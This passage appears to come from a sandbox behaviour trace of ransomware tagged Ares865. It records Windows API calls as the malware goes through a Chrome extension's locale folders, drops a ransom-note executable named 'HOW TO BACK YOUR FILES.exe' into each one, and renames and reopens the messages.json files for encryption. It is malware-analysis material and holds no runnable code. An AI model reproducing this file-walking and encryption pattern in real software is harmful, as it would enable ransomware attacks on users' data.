Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.732] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.735] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi" [0102.735] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi" [0102.735] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.735] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.735] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.736] GetLastError () returned 0x0 [0102.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.736] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebff7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebff7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.736] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.736] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.736] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.Ares865") returned 162 [0102.736] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.738] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.741] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es" [0102.741] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es" [0102.741] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.742] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.742] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.742] GetLastError () returned 0x0 [0102.743] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.743] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec25900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec25900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.743] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.743] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.743] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.Ares865") returned 162 [0102.743] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.755] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.760] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en" [0102.760] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en" [0102.760] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.760] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.761] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.761] GetLastError () returned 0x0 [0102.761] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec25900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec25900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.761] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.761] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.761] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.Ares865") returned 162 [0102.761] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.763] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.766] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el" [0102.766] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el" [0102.766] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.767] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.767] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.767] GetLastError () returned 0x0 [0102.768] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.768] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec25900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec25900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.768] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.768] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.768] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.Ares865") returned 162 [0102.768] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.770] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.774] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de" [0102.774] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de" [0102.774] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.774] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.775] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.775] GetLastError () returned 0x0 [0102.776] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec4ba60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec4ba60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.776] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.776] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.776] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.Ares865") returned 162 [0102.776] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 